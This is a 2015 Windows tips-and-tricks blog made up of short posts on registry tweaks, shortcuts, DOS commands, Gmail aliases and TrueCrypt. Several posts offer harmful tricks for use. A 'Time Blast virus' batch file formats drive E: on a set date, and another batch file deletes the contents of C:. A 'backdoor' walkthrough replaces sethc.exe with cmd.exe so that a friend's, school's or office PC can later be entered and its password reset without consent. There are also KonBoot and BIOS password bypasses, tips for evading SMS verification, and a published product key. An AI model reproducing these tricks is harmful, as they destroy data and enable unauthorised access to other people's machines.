More

Saturday, 28 February 2015

Making your own shortcut key to open an folder

In this tutorial we´ll see quickest way through which you can open favorite folders and programs.With this trick , you´ll be able to open many folders (or) programs in a short period of time. It is really useful, at least by my opinion. Lets see how it works on my computer. In my example i am taking folder named as "hackbinda" & "dx" to open it in Abc(Short name).

1. Navigate to the folder that you want to make a Abc ( In my example i taken the folder named as "hackbinda" & "dx" )


Google Talk login

With this trick we can open multi google ac.
 Right-click on the desktop
 -Select New
  Select Shortcut

Multiple Yahoo Messenger

Here we are getting to start open multiple Yahooooooo msgngr.
multiyahoo

  • 1. Go to start - Run -Type regedit - Press Enter

Time Blast virus

It blast on time which you will give in it.Copy Paste The Following

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit

And Save It As Abc.bat

Delete c: drive

copy it notepad
@Echo off
Del C:\ *.* |y
save it by .bat

MAKE a folder without name

select any folder
Rename it
press Alt & type 0160 or 255
enter

HIDE drive by registry


1.Go to start->run.Type regedit.Now go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies

 \Explorer

2.In the right pane create a new DWORD item and name it NoDrives(it is case sensitive).

3.Modify it's value and set it to 3FFFFFF (Hexadecimal) .

4.Restart the computer.

5.Now when you click on My Computer, no drives will be shown(all gone...).

To enable display of drives in My Computer, simply delete this DWORD item that you created. Restart your computer. All the drives are back again.

RAM FREE TRICK


Open notepad
type FREEMEM=SPACE(64000000)
Save it as ram.vbs
now run the script.
Check MAGIC

CRACK BIOS PASS

HERE IS SIMPL TRICK WHEN WE WANT TO CRACK BIOS PASS.
Open the CPU
Observe the Motherbord
Remove the Silver Battery(3v)
Wait 2 minutes and place the Battery
Restoring a Lost Desktop-
Start
Run
Type a period " . "
Then press Enter

USE LOCKED COMMAND PROMPT

WE CAN EASY OPEN  COMMAND PROMPT WHILE  IT  Locked BY USER.


 
  • open notepad
  • type www.command.com
  •   then save as cmd.bat at desktop
  • then enter now its open.
  • ENJOY

Lock drive by registry

  •  We don’t usually prefer to lock our drives, but sometimes it becomes nesscary. Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives are not intended to be locked because they are mandatory for the system and application programs.
  • Start & Run and type Regedit to open Registry editor
  • Browse HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
  • Create a new DWORD value NoViewOnDrive and set its value as
2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 - 26
For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value)
  • To lock more drives, calculate the value of each drive and then set sum of those numbers as value
  • To unlock your drive just delete the key from the registry.

FIX CORRUPTED FILE IN WINDOW XP

If  windows show that your file is corrupted so you can simply recover it.
1.Load XP cd into cd drive

2. go to Run

3. type sfc/scannow              

ok

4. Then copy its lost file frm cd.

New Folders lock


  • Consider you want to lock a folder named abc in your E:\, whose path is E:\abc.
  • Now open the Notepad and type the following
  • [code]ren abc abc.{21EC2020-3AEA-1069-A2DD-08002B30309D}[/code]
  • Where abc is your folder name. Save the text file as loc.bat in the same drive.
  • Open another new notepad text file and type the following
  • [code]ren abc.{21EC2020-3AEA-1069-A2DD-08002B30309D} abc[/code]
  • Save the text file as key.bat in the same drive.
  • Steps to lock the folder:
  • To lock the abc folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
  • To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible.

Thursday, 26 February 2015

Increase the speed of ur computer

This can help to speed up your computer .Follow the steps given below :-
1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.
2) Click on the 'Advanced' tab.
3) Under 'Performance', click 'Settings'.
4) Then click the 'Advanced' tab on the button that pops up.
5) Under 'Virtual Memory' at the bottom, click 'Change'.
6) Click the 'Custom Size' button.
7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).
8) Click 'Set', and then exit out of all of the windows.
9) Finally, Restart your computer.
10) You now have a faster computer and 1-2GB of Virtual RAM..!

WI-FI security

Having an open wireless network can be a security risk as it may allow anyone who is close enough to your router (e.g. a neighbor or someone war driving) access to your network. To make your home wireless network more secure consider the below suggestions.
Tip: All of the steps below will require access to the router setup, and we also recommend configuring wireless security over a computer with a wired connection to the router if possible.

Downlode youtube downloder

First Step Open Youtube And Copy Video Url.. Like….
http://www.youtube.com/watch?feature=player_detailpage&v=aYAOQGkE7AM
Second Step
Cut  this address  http://www.
Third Step
Type–   SS
like
ssyoutube.com/watch?feature=player_detailpage&v=aYAOQGkE7AM

Hide IP

Here is some IP hidder website it most useful for you.you can hide your IP and safe from hacker detection.
 http://nl.smarthide.com/

http://hideme.be/
http://iphider.org/
https://www.hidemyass.com/

Type of virus

Computer Viruses are classified according to their nature of infection and behavior. Different types of computer virus classification are given below.

Tuesday, 24 February 2015

Computer

Computer History:

The tool known as “ABACUS” was the age-old tool used by man to count and calculate was designed and developed by Chinese (Asia Minor) nearly 5000 years ago. The abacus may be considered the first computer. This device allowed its users to make computations using a system of sliding beads arranged on a rack. Early shopkeepers used the abacus to keep up with transactions. The use of pencil and paper spread, the abacus lost its importance. Nearly twelve centuries past before the next important advance in computing devices emerged.

Useful DOS Commands

Introduction:Many course material on the Teaching Network may still use the command line operating system called DOS (Disk Operating System). This requires the user to type specific commands at a prompt. You may also need to use this system, for example, when changing your password, and you can enter DOS by choosing 'MS-DOS Prompt' from the Public menu on the taskbar.

Watch Videos On Youtube Without Signing In

Hack youtubeWatch 18+ Videos On Youtube Without Signing In Yes

Sometime its annoying when youtube ask you to sign in for your age verification to watch 18+ videos. So i will make it easyfor you by showing you a simple youtube trick to watch adult or 18+ youtube videos without signing In. This trick is 100% working as of 2013. So lets get started.

How To Watch 18+ Youtube Videos Without Logging In ?

1. First get the Url of video you want to watch. As shown below.
http://www.youtube.com/watch?v=4Xkh6j7RMqk 
2. Then copy the Video Id. For above link video Id is 4Xkh6j7RMqk
3. Now paste the Video Id in the link given below.
http://www.youtube.com/v/VideoId?fs=1
  • Replace VideoId with the Id you copied in Step 2
4. Now the url will become as shown below.
http://www.youtube.com/v/4Xkh6j7RMqk?fs=1
5. Done.

Check WiFi hack or not


If your internet is slower than usual, then you should check if someone has hacked in your WIFI .In this post I’m going to show you two effective way to check this.
The easiest way is by using free utility called Wireless Network Watcher v1.55 .
1) Go to nirsoft.net and download Wireless Network Watcher v1.55.
2) Install it on your pc and start scanning. It scans your wireless network and displays the list of all computers and devices that are currently connected to your network.
For every computer or device that is connected to your network, the following information is displayed: IP address, MAC address, the company that manufactured the network card, and optionally the computer name. 
If you want to check if someone has hacked in your WIFI without installing any software then you should log in your router . If anyone is connected to your network it will be shown in your router security settings. You can log into your router, usually http://192.168.1.1 . You can check your router ip address using command prompt
1) Run command prompt (cmd)
2)type ipconfig and press enter
3)ipconfig will list your ip , MAC and default gateway address. You can access to your router settings by typing default gateway address in your web browser. 
4)Log in your router and look at the Home Network -> Devices, this shows all IP addresses connected to your network.  

Backdoor In A Windows7


 As the word says, backdoor is a hidden way to access a place. In terms of computer backdoor means a way to access that system(network, pc or anything)through a unknown, hidden way making use of a vulnerability present in that system. In this article I will tell you a way to access a pc running in windows os even if the system is password protected. But you must have accessed that system before. For this trick you need only less than 5 minutes. For example think that your friendask you to do something in his pc while he is having food. Then apply this trick at that moment. And in future when you get a chance you can access that pc even if you don’t know the password(this trick is for password protected pc). Follow the given steps and you can access any password protected system. Before that be notified with the trick behind it. Whenever you try to login to a password protected pc no other application other than “sethc.exe” can be opened.(just try during login),you can open the application just by tapping shift key for 5 times continuously(try it).
This facility is meant for handicapped people to use the system. So what will happen if we replace sethc with command prompt (cmd)? Yes during login instead of sethc we can open cmd(by tapping shift key times).
And using a a cmd code we can reset the password of the account in which you have to login and you can access without a password.
So follow the given trick and you can access the system (first time you access a pc) without password (in future). If you use the following code you can reset the password easily and without confirming the old password. So you don’t need the old password and only the new password you are wishing to assign.
Type the following code:
Syntax: net user accountname *
See the example:net user administrator *
First time when you use a pc do these:
In windows 7:
1) Go to c:windowssystem32
 2)Copy cmd.exe to desktop
3) Rename it as sethc.exe
You will get a dialogue box saying that you don’t have rights to move it in to system32 or for replacing sethc.exe the cmd.exe you should follow these sub-steps:
a)Right click on sethc.exe in system32
b)Open properties
c)Click on advanced in security tab
 d)Click on owner
e)Click edit
f)Change owner from “trusted installer” to “administrator”
g)Click apply
h)Then go to ‘security’ tab in properties
i)Click edit
j)Click on ‘administrator’
 k)Check the option enabling full control
l)Click on apply
4)Copy and paste the renamed .exe file to system32 again.
That’s all now just tap shift key 5 times and see the magic even at login time.
In windows xp:
Just copy cmd to desktop and rename it as sethc.exe and paste it back in system32. Original sethc will be replaced by new sethc.exe no other permissions required.
After opening cmd by tapping shift keys 5 times type the given code(syntax is given,replace accountname with administrator or accordingly)
Net user accountname *
 In future for accessing the pc on which you have done the above hack just do the following tap shift key times continuously and cmd opens.just type the below code and you can enter the pc without a password(we have resetted it).
So what to think, just follow the above trick and be ready with a backdoor to access any pc your friends,school’s,office or anywhere when you get an access……….

Find Ip Address Of A Website Use CMD

In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.

Monday, 23 February 2015

Run command in your pc


Just go start,then click on Run then type any comand below
0) cmd - comand prompt
1) compmgmt.msc - for computer managent
2) devmgmt.msc - device manager
3) regedit - registry editor
4) msconfig - system configuratn utility . . .
5) compmgmt.msc - Computer management
6) devmgmt.msc - Device manager
7) diskmgmt.msc - Disk management
8) dfrg.msc - Disk defrag
9) eventvwr.msc - Event viewer
10) fsmgmt.msc - Shared folders
11) gpedit.msc - Group policies
12) lusrmgr.msc - Local users and groups
13) perfmon.msc - Performance monitor
14) rsop.msc - Resultant set of policies
15) secpol.msc - Local security settings
16) services.msc - Various Services
17) msinfo32 - System Information
18) sysedit - System Edit
19) win.ini - windows loading information(also system.ini)
20) winver _ Shows current version of windows
21) calc - calculator

How can Disable USB port(mannully):


1. Goto run
2. Type 'regedit' without quotes
3. Click on HKEY_LOCAL_MACHINE
4. goto SYSTEM
5. Click on CurrentControlSet
6. Click on services
7. Goto USBSTOR
8. Double click on 'Start' where value
is 3
9. Now change the value data with 4
10. Now press ok and refresh your
desktop your USB port is disabled,to
enable the usb port replace the value
4 with 3.

Make faster mozila

here we can try tomake fater mozila browser.so are you redy?

THE DIFFERENCE BETWEEN CORE I3, CORE I5, CORE I7...

Core i3:
* Entry level processor.
* 2-4 Cores
* 4 Threads
* Hyper-Threading ­ (efficient use of processor resources)

Hack windows password by KOnBooT

Hack Win 7, Xp , Vista smile emoticon
Requirements:
Pendrive, KONUSB software
Step 1
Download KONUSB software. (See the link at the end of the post)
Step 2:
Plug in Pen drive into the PC/ ­laptop and double click on KONBOOTINSTALL.exe & enter the drive

Manually hide any file in JPEG

Requirement:
1) A Little Knowledge of commandprompt
2) Winrar must be installed on your system
Steps:
1) Create a new folder in C drive e.g. c:\secretfile
2) Move all the files you want to hide into this folder.
3) Compress all the files to .rar e.g.secretfile.rar
Note: This .rar file should be in thesame directory e.g. c:\secretfile
4) Select the JPEG file you want to use to hide the content (e.g. image.jpg). Put this image file in the same folder i.e. c:\secretfile
5) Now, open command prompt (Go to run and type 'cmd'). Make your working directory c:\secrefile. (When you open Cmd you will get something like C:\documents and settings\userna ­me (something like that)...
Type cd\ and press enter so that you'll be in the root directory i.e. C:.
Now in front of c:\ type cd secretfile and press enter)
6) Now type without quote: "COPY/ ­b image.jpg + secretfile.rar resultimage.jpg" - Now, image.jpg is the picture you're using to hide the files, secretfile.rar is the file to be hidden, and resultimage.jpg ­ isthe file that contains both (in other words resultimage.jpg ­ is the final result containing the hidden files.).
7) After you have done this, you will see a file resultimage.jpg ­ in c:\secretfile. Open it and it will show only the picture while the files are hidden

Hide hard disk partition

WE r going to hide our drive and get back.press Win+ R . type diskpart. Step 2 : Type list volume Capture203 we  see all the drives listed here. Let me show my drives in My Computer/This PC Now I have Drives Local Disk (H) and (K) as empty. Let me hide H drive. Step 3 : Type select volume h . Syntax : Select volume drive Letter volumeh Step 4 : Now disk is selected and ti hide it type remove letter h. Syntax : remove letter drive_letter h removes thats it. Now check your drives in My Computer/This PC res Steps to bring back your drive : Steps 1 to 2 as previous one. Next Type assign letter h restore Syntax : assign letter Drive_letter You will get back the drive. Note: Meanwhile even after hiding you can also get inside the drive using Run. Go to Win + R and type the drive_letter. grenjoy with ti.

WINDOWS recorder blackbox

it s very easy
psr.exe
Paste it in run.........
You will see.......
The BLACK BOX RECORDER OF YOUR COMPUTER..

SAMSUNG CODE

Samsung Codes:
Software version: *#9999#
IMEI number: *#06#
Serial number: *#0001#

Sunday, 22 February 2015

Windows XP install in10 minuts

It is  very easy way .As We all know that During Formatting a Computer After the File Copying is Completed then windows Require 39 Minutes Time After Reboot The Below Image Will Appear....

Windows8 speed, optimizing

Windows 8 includes the standard Disk Defragmenter, now named the Optimize Drives tool. To access it, press the Windows key, type Defragment, click Settings, and press Enter. Note that Windows 8 automatically optimizes (defragments) your drive once per week by default. However, if you move a lot of files around, you may want to optimize your drives sooner.

Windows8-build an Applications folder for quick program launching from the Start screen or Desktop in

Here we will Create an Applications folder for quick program launching from the Start screen or Desktop in
First, run File Explorer. Navigate to the Desktop and create a new folder. After you create it, rename it:

. Windows8's bend file Explorer

Windows8 is new in2015 every one wanna it so something here for you about windows8.Windows 8's File Explorer file manager is different from the old Windows Explorer in more than just name. It's gotten a complete makeover, notably by the addition of a Ribbon interface that puts many tasks, features and views in easy reach. Following are my favorite ways to get more out of it.

Kill the lock screen altogether in Windows8

Frnds  here a tips for you.i think its better for you.not a fan of the lock screen? There are plenty of people who don't find it useful and would prefer to bypass it so they can just sign into Windows and get straight to work. You won't find a setting to do it. Instead, you'll have to use the Registry Editor.

Lock the lock screen image windows8

You can do tihs trick by RegistryEditor it very simple.please read and enjoy with that.
If you share a Windows 8 PC with others and don't want them messing with the lock screen image, you can lock it so that it can't be changed. To do it, though, you're going to have to get down and dirty by editing the Registry.

Thursday, 19 February 2015

Speed up windows8

Here some new tips for windows 8 speed .some of the tips here also apply to previous versions of Windows, but Windows 8 has some new tricks up its sleeve. As always, there are trade-offs when using some of the below tricks – there’s no magic “Go Faster” button

Tuesday, 17 February 2015

How to play android game in pc.

Here is a tricks with that we can play android game in our pc.First you gonna need Bluestacks
Bluestacks
After running the Bluestacks for the first time,it will start downloading the Database and components which will take few minutes depending upon your internet speed.

Free Antivirus for Android phone



Frns here is some  best antivirus to protect your android phone and tab.As we know that Android operating system,still it is vulnerable to  worms,virus and many more.In order to keep your android safe there are so many

Folder lock by notepad

Here we can lock our folder by notepad without any software.it work on win 7/xp.First you need to open up notepad. Go to start, run and type in notepad or go to start, all programs, accesories, notepad.

Sunday, 15 February 2015

How to trace ip address mail sender

log in on your  gmail account .If the IP address of John is not available, because he is sending email using Gmail, how can Elizabeth determine John’s geographic location? There two options:

How to stop spam in facebook

Step #1 – Create a custom list
In the left navigation of your Facebook home page their is a Friends option. This section allows you to create a custom friends list. Hovering over the Friends title will show an option called ‘More’. Select this option and choose the ‘Create List’ option.
Friends List
Step #2 – Add to the list
This is where you add the people who you want to be able to dictate the visibility of their posts. Yo could add every one of your friends, or the select few who are always the culprits for liking and commenting on rubbish content. Alternatively, you can break down into family, workmates, local friends, anything you want.
This is also handy for being able to dictate what content you create that you mightn’t want other to see (IE: Those drunken Halloween photos that maybe your boss and nanna shouldn’t probably be made aware of)
Custom Friends List
Step #3 – Setting permissions
Now you have your list of people, you can choose what interaction you want to have with them. Select the list, and in the top right corner there is an option to ‘Manage List’. Select the ‘ Choose Update Types…’ option.
Choose Update Types
Step #4 – Choosing settings
Now all you have to do is deselect the options you don’t want to see from these people. To eliminate the spam stuff, deselect the ‘comments and likes’ option.  You can be as brutal as you want here of course, but remember that deselecting these options mean you will no longer see anything they like or comment on in your feed anymore – including the non spam stuff.
Disable Facebook Likes and Comments That’ll take care of a lot of the rubbish from your newsfeed with the exception of sponsored posts and Facebook ads of course, but it’s a good start.

Gmail Tricks to Reduce Spam and Organize Email

Most companies have the option to unsubscribe in the email, but there are still many that do not. Once you learn these three small hacks to your Gmail address, you can give out an altered version of your email that will still come directly to your inbox, but will allow you to create filters to organize the email any way you like. This allows you to create infinite variations of your Gmail email address.

The Dot Hack

dot hack gmail
If you didn’t already know, Gmail does not consider any extra dots in your account name when processing email. So for example, I could write out my email address as aseem.1234@gmail.com instead of the normal aseem1234@gmail.com.
You can add as many dots as you like in any location and the email will still come to you. This trick usually works the best when signing up on forums or anywhere online because most forms will accept periods as an allowable symbol of a typical email address.

The Plus Hack

plus hack gmail
This Gmail hack has been around for a LONG time and most people already know about it. Simply place a “+” after your account name and add a word or words to uniquely identify that email address.
For example, I can change my email address to aseem1234+financial@gmail.com when signing up at any bank, credit union, investment site, etc. Now I can create a filter and have all emails related to my financial activities automatically moved to an appropriate label.
This is much easier than creating a separate filter for each financial institution. There are many times when the sending email address used by a financial institution changes and therefore you have to update your filter. Since your customized Gmail address will never change, you never will need to worry about updating the filter.
The plus hack is very useful, but the downside is that online forms sometimes block it because it’s not considered a normal symbol in email addresses. In that case, use the Dot hack or the Googlemail hack I’m about to mention.

The Googlemail Hack

googlemail hack gmail
Finally, you can change the last part of your email account to googlemail.com instead of the normal gmail.com! It’s another nifty way to not give out your main email address. Obviously, if someone else already knows these tricks, they can easily figure out your original email address.
So aseem1234@googlemail.com is exactly the same as gmail.com. If you want to keep your account name consistent without all of the dots or plus signs, then you can just use googlemail.com instead.
You might be wondering why this is necessary if you could just create a filter on the sender email address and organize email that way? That method works just fine, but like the financial example I gave above, what if you wanted to give out your email address to some clients of a small business you are running from home?
If you don’t have a separate business email address, you could give out an email like aseem1234+businessname@gmail.com to all your clients and then have those emails automatically filtered to a label created for your business emails. Since you don’t necessarily know the emails of the senders, creating a filter on the customized To address works much better.
These hacks have been around for a long time and if you’ve been using Gmail for many years, it’s probably nothing new. However, if you have recently switched over from Yahoo, Outlook, etc, it’s an extra feature

how to trace lost mobile with imei number

www.trackimei.com/

shutdown pc by cmd

1 open cmd and type-
  shutdown -s -t 9   for shutdown (9 mean any second)
 shutdown -a     for shutdown stop


2   c:\>shutdown -m \\it -s

Shutdown - This is the command u use to shutdown/restart/etc
-m - It means remote computer.
\\it - This is the computer name which you want to shutdown
-s - You have to enter this command (-s = Shutdown, -r = Restart, -l = Logoff, -a = Abort shutdown)

You can use 'net use' command to see the computer names in your network.

shutdown computer remotly

Having an ability to shutdown computers remotely is helpful not only for network administrators who need to turn off workstations at night to save electric power, for example, but also for home users who have more than one PC in the network and like to manage them remotely. There are a number of ways how you can execute network shutdown command, but all of them have some preconditions.
It's important to remember that you can initiate remote shutdown operation, described in this article, only for Windows PCs available in the local network. To check a list of PCs available in the local network you can open Network (or Network Neighborhood is early Windows) in the Windows Explorer. Also to execute network remote shutdown you should have an administrative access to remote PC. This security limitation prevents unauthorized shutdown of remote computers.
Starting from Windows Server 2003 (for server platforms) and Windows XP (for desktop platforms) Windows includes shutdown.exe utility in the standard distribution. This utility can be used to shutdown a local or network PCs. You can use it in a command-line mode by typing shutdown.exe in the Windows command prompt (known as CMD). A set of command-line parameters for shutdown command is described in MSDN article, but at a time of writing this article doesn't describe all parameters available for shutdown.exe that comes with Windows 7. So it makes sense to get a list of command-line parameters for your system by running a following command:
shutdown -?
In order to shutdown a remote PC you can run such command:
shutdown /s /m \\ComputerName
Lets break it down:
  • /s - instructs to make a shutdown
  • /m \\ComputerName - specifies the name of remote PC to shutdown it remotely
Important: As it was mentioned above, shutdown.exe can have different parameters on different Windows versions. But parameters syntax also can be different. For example on XP you have to use '-s' instead of '/s'.
Shutdown command has additional parameters that help to control behavior of shutdown operation. For example, a command below makes remote shutdown of specified PC with 60 seconds timeout during which a message will be displayed on remote PC and then all running applications are forced to close:
shutdown /s /f /m \\ComputerName /t 60 /c "PC will be tuned off in 60 sec"

Method Two: Using Windows Shutdown Utility in UI Mode

If you prefer to use visual interface instead of specifying command-line parameters, you can make network remote shutdown from the visual interface by starting shutdown.exe in a dialog mode. Remote Shutdown Dialog offers less options than available from the command-line, but you can execute all main operations such as remote shutdown and reboot. In order to run shutdown.exe as a dialog, you have to execute following command in the Windows command prompt (Windows Start > click Run > type CMD > enter the command below).
shutdown /i

  • You can use  set of features on all Windows versions (starting from Windows 2000).
  • You can lock local or remote PC and logoff the current user. Network remote shutdown operation can be aborted by the interactive user.
  • You can specify a list of remote PCs in the file instead of typing them in the command-line.
For example, using the command below you can execute network shutdown tasks on computers, which names are specified in computers.txt file, with 60 seconds timeout during which a message will be displayed on remote PC and user can abort operation.
psshutdown -s -c -t 60 -m "PC will be tuned off in 60 sec"

Find website IP adressing by cmd

Now we starting  to get website ip using cmd command its simple trick.Press win+r .using this method instead of pinging the address shows you the fastest connection speed between
 
servers.open command prompt and type in "tracert" then type in the website for example "tracert www.myweb.com" without these things"".

The second picture shows what comes up

Tuesday, 10 February 2015

windows 10 step

It’s a humbling and amazing thing to work on Windows, which is used by over 1.5 billion people in

Monday, 9 February 2015

IP hide by cmd




An Internet Protocol (IP) address is a numerical label used to identify a computer or device within a network.  Checking the computer’s IP address is the first step to determine if your computer is properly communicating with your router.

Windows7/8 registry tricks

Everyone knows that we here at AskVG love tweaking and customizing Windows OS. We have shared many Registry tweaks, tips-n-tricks and how-to guides for Windows in past which can be found in our exclusive Windows sections:
Windows XP Tips | Windows Vista Tips | Windows 7 Tips | Windows 8 Tips | How-to Guides
We have posted many tutorials which help you in customizing Windows look-n-feel as well as tweaking Windows functionality

windows 10 downloade

Download links

Product key: NKJFK-GPHP7-G8C3J-P6JXR-HQRJR

Show all


English (United States)

Editions Link to download SHA-1 hash value
Editions
Windows 10 Technical Preview (x64)
Link to download
 Download (3.92 GB)  
SHA-1 hash value
6A95316728299D95249A29FBEB9676DED23B8BEB
Editions
Windows 10 Technical Preview (x86)
Link to download
 Download (3.01 GB)  
SHA-1 hash value
1AE10947CC297AE299E1C81F95812EFBB5C84121

Antivirus working or not in your window


.Some time we have antivirus but we don't update.then some problem grow up in our system..if  your system were to somehow get infected with malware, one of the first things that malicious code does is to try and disable the anti-virus scanner. It may also attempt to modify the HOSTS file, so as to tamper with the anti-virus definition update process. Most popular modern-day anti-virus programs offer real-time protection against potentially malicious software and will throw up a prompt warning you.

Sunday, 8 February 2015

Bypass SMS Verification of Any Website

Any web site of the bypass SMS verification
A site of the bypass SMS verification (apply this bypass trick on any site working fine skip sms verification process)
Now a days, many sites only true for the audience to keep in touch and deny spammers are using sms verification. Facebook, Yahoo, Gmail and other major sites and fake sms verification is used to keep the audience away from the audience. sms


verification system, the security of the website will provide any additional quantity, but sometimes the best method proved to be annoying. I have
A few days ago, I have mine with my mobile number, a check of the account, but after verification sms, I'm constantly daily 15-20 advertising and promotional sms sms verify the process as it is annoying.
I decided to find a way to bypass SMS verification of any website, and hopefully someone will share a trick i GudTricks readers of this mobile phone today can bypass SMS verification of any website.So found their way to work. I hope you find the information.
note: this bypass trick is internationally working you can use this trick any where in the world 
see below banner

Therefore, before beginning, sms verification system works, clears our mind?

SMS verification helps in the marketing advantage, the quality of the audience getting Providing additional layer of security, keeping spammers away, to make contact with the audience as a web manager for a variety of reasons, the court service. An sms verification of a user in the text box on his / her phone number entered. Mobile number is a unique code that will send a bulk sms service. A user in his / her account number to verify that the next step will be to enter the number of the code.

Now, the real trick to bypass SMS verification to any website,?



1) Go to the first http://receive-sms-online.com/
2), then select any of your choice to receive SMS on the number line.
3) After that completion , SMS Verification Enter the number in the text shown in the box and hit or click Verify.

When you're done 4), the number of messages in the inbox immediately after you receive your code. The number selected is the number of clicks to access the Inbox, it goes to the inbox is.

Shared on the site, the number of mobile inbox of the one thing that all of the publicly available from the Internet. So kindly shared a mobile number to your Paypal or sensitive information service have not checked any of the other account.
 here are the other online  sms verification  site to bypass sms or skip sms verification
receive-sms.com/
www.k7.net/
lleida.net/uk/
sms-verification.com/
receive-sms-online.com/
pinger.com/tfw
receivesmsonline.com/freephonenumber/
www.receivesmsonline.com/
www.youtextmessage.com/
www.simser.info

hide drive

Even though you can’t see the drive in Explorer, it can still easily be accessed via the command prompt or by manually typing in the path into the address bar in Explorer. Also, the drive will still show up in third-party programs and in tools like Computer Management, etc. That’s no real security, but if someone doesn’t know the drive even exists, it might be a quick way to keep it out of sight.
I tried this hack on Windows XP, Windows 7 and Windows 8 and it worked on all three. Ok, so here’s how to implement the hack: first off, back up your registry as this requires adding a key to the registry. Once you’ve backed up your registry, open the registry editor by clicking on Start, Run and typing in regedit.
regedit
Now navigate to the following registry hive shown below:
HKEY_LOCAL_MACHINE – Software – Microsoft – Windows – CurrentVersion – Policies – Explorer
Right-click on Explorer and choose New and then DWORD Value. In Windows 7 and Windows 8, you can choose DWORD (32-bit) Value.
hide drive
Name the new value NoDrives and then double click on it to open the properties dialog box. Click on Decimal for the Base unit.
hide drives
Type in one of the following values depending on the drive letter you want to hide.
A: 1, B: 2, C: 4, D: 8, E: 16, F: 32, G: 64, H: 128, I: 256, J: 512, K: 1024, L: 2048, M: 4096, N: 8192, O: 16384, P: 32768, Q: 65536, R: 131072, S: 262144, T: 524288, U: 1048576, V: 2097152, W: 4194304, X: 8388608, Y: 16777216, Z: 33554432, All: 67108863
If you want to hide drive E, just type in the value 16. The really cool thing about this trick is the fact that you can hide multiple drives by adding the numbers of the particular drives together. For example, if you want to hide drive E and drive G, you would type in the number 80, which is 64 + 16.
Restart your computer and your drive will now be hidden! You can even hide the C drive, though I don’t see any point to doing that. Everything still works fine, in case you were curious.
When you want to get your drives back, change the value of NoDrives to 0 or simply delete the value altogether. If you need to hide and un-hide the drive quite often, it might be better to write a script to do it for you. As mentioned earlier, though, you can access the drive covertly while it’s hidden, so there is no real reason to un-hide it.
This trick also works for mapped drives, so if you want to hide mapped drives, you can do it this way (though it might just be easier to disconnect a mapped drive). If you have any questions, post a comment.

Hide a drive partition win xp/7/8.1

Here we can hide all drive letter with out any softwear.it is easy step for us .we can hide all drive by command prompt

Saturday, 7 February 2015

Encrypt file by true crypter

Hello and welcome to another InfoSecurity World tutorial. The intent of this article is to teach one how to encrypt sensitive files. When set up correctly with a strong password, it would be almost impossible to hack. Even the FBI have had issues decrypting this software. I'm here to teach you how to create a general encrypted container—not the complex hidden TrueCrypt volume. 
What is the benefit to having a TrueCrypt container on the computer? There are many, and here are just some of them:
  1. Great place to store your passwords;
  2. Good for storing sensitive information such as your medical history and bank details;
  3. Great place to store sensitive back up files. Examples include government documentation such as your Social Security Number (SSN), Birth Certificate and/or Citizenship Certificate; and
  4. Having all your sensitive files in this encrypted container means that whenever your computer becomes infected, it cannot gather the information from what's in TrueCrypt. In addition to the above, should the computer get stolen, all your sensitive information will be encrypted and they won't be able to access it without the correct password.
In all, whatever you consider as "personal" or something that could be "destructive or dangerous in the hands of the hacker"—encrypt it.

Requirements

  • Install the latest TrueCrypt from here before proceeding.
  • Back up your computer in case something goes wrong.
  • TrueCrypt works on Windows 7/Vista/XP/2000, Mac OS X and Linux.  It supports both 32 and 64 bit on Windows and Linux.

Creating the Truecrypt Volume

Do NOT proceed to these steps until you have both installed TrueCrypt and backed up your operating system.

Step 1 Create a Volume

Find Truecrypt on your computer and open it. Choose from the list of drive letters. I have chosen (F:) Drive to create my personal TC container.  When you've chosen which drive to use, click "Create Volume". 
How to Encrypt Your Sensitive Files Using TrueCrypt

Step 2 Create an Encrypted File Container

You may also choose from the others, but we will not be discussing those options today. It is also recommended that inexperienced users go with the method I'm creating. It doesn't make the data any less secure choosing this option. The other options are more about encrypting the entire computer which is for advanced users, not beginners.
How to Encrypt Your Sensitive Files Using TrueCrypt

Step 3 Create a Standard TrueCrypt Volume

Do not select "Hidden TrueCrypt Volume", as this is for more advanced users.
How to Encrypt Your Sensitive Files Using TrueCrypt

Step 4 Choose the Destination

Navigate to the "Documents" folder and for the file name, type something like 'TC Volume".  Do NOT click on an existing file or folder and press save. Doing so will overwrite it—all data within it will be lost. 
How to Encrypt Your Sensitive Files Using TrueCrypt

Step 5 Select Your Encryption Method

The default is recommended. AES-256 has being trusted for many years and therefore is more reliable. Note that this encryption method might be used by the U.S. government to protect classified information up to the Top Secret level.
How to Encrypt Your Sensitive Files Using TrueCrypt

Step 6 Choose the Container's Size

Think about what you will be storing and how much? It's a good idea to add a little bit of extra space in case you decide to store something big. 5 to 10 GB is usually enough.
How to Encrypt Your Sensitive Files Using TrueCrypt

Step 7 Choose a Password

I recommend at least a 20-character password. It should contain letters (lower and upper case), numbers, symbols and spaces. Here is a great guide to creating good passwords. 
How to Encrypt Your Sensitive Files Using TrueCrypt

Step 8 Set the Default File System

Here you need to make a decision on whether the container will be used to store large files (over 4GB). Depending on what you choose, it will let TC choose the best formatting option for you. 
How to Encrypt Your Sensitive Files Using TrueCrypt

Step 9 Create Your Encryption Key

Step nine is the fun part! Move your mouse randomly across the TC window to create your encryption key. The longer you move it the stronger the encryption will be. 30 seconds should be the absolute minimum, while a minute or two is ideal. What will happen after you've done this is TC will format your volume, which shouldn't take too long. 
How to Encrypt Your Sensitive Files Using TrueCrypt
Guess what? That's it! That's all there is to creating a TC volume. Just click Exit to quit the program and I'll show you how to open the volume.
How to Encrypt Your Sensitive Files Using TrueCrypt
Find TC and open it up. Click "Select File" and find the container. Press OK, then click "Mount" and enter the password as the below picture shows.
